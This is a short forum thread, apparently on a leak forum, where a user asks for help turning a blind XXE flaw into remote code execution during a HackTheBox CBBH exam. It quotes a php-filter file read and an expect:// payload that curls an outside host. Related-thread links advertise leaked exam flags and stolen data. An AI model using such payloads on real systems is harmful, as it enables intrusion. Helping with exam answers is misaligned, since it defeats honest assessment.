Oct 14, 2023, 11:06 AM
I want someone experienced to discuss a vulnerability of the exam
|
Can I discuss CBBH exam with someone?
by ghghghgh - Saturday October 14, 2023 at 11:06 AM
|
|
Oct 14, 2023, 11:06 AM
I want someone experienced to discuss a vulnerability of the exam
Oct 14, 2023, 11:08 AM
Haven't done the exam but I'm down to listen
Oct 14, 2023, 11:15 AM
(Oct 14, 2023, 11:08 AM)GeneralGrievous Wrote: Haven't done the exam but I'm down to listen There is a part with blind xxe blind vulnerability, I was able to use php filter to read internal file, then i tried to use expect:// wrapper and curl my local webserver and i got the request, so I guess the expect wrapper is enabled and it can lead to rce. But when i tried for example to `cat somefile > /tmp/somefile` with expect and then read /tmp/somefile with php filter, i dont get anything. Payload for expect that i used is `expect://curl$IFS'ip/hello'` My question is what payload i can try to use here if it seems that only curl is working?
Oct 14, 2023, 11:23 AM
(Oct 14, 2023, 11:15 AM)ghghghgh Wrote:(Oct 14, 2023, 11:08 AM)GeneralGrievous Wrote: Haven't done the exam but I'm down to listen If the only thing you could is send HTTP requests, maybe a SSRF Are you encoding the payload correctly?
Nov 18, 2023, 08:20 AM
The last non-spam response in the topic was more than a month ago. I close the topic as irrelevant to prevent spam. If this is not the case, please send a pm and I will open the topic for discussion again.
See dead links, reposts, or threads without samples in Databases/Other Leaks/Stealer logs? Report it or tag me @Addka72424
New on this forum? Check this thread | TOR Want to get credits by reposting leaks? Check Earn credits by reposting leaks! | TOR Want to add your thread to the official section? Check Add to official requests | TOR Don't know how to use forum Escrow? Check How to use BreachForums escrow | TOR Looking for verified leaks that haven't been added to the official index yet? Check Unofficial Database Index | TOR :420line: |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] HackTheBox Dante - complete writeup written by Tamarisk | 602 | 91,628 |
3 hours ago Last Post: sabero_exe |
||
| [FREE] CPTS 12 FLAGS | 68 | 1,955 |
Today, 09:54 AM Last Post: VictorPipeau |
||
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 371 | 92,851 |
Today, 08:48 AM Last Post: phannguyenbaouy1 |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 21 | 2,620 |
Today, 05:08 AM Last Post: popoler |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,271 |
Yesterday, 02:10 PM Last Post: kkkato |
||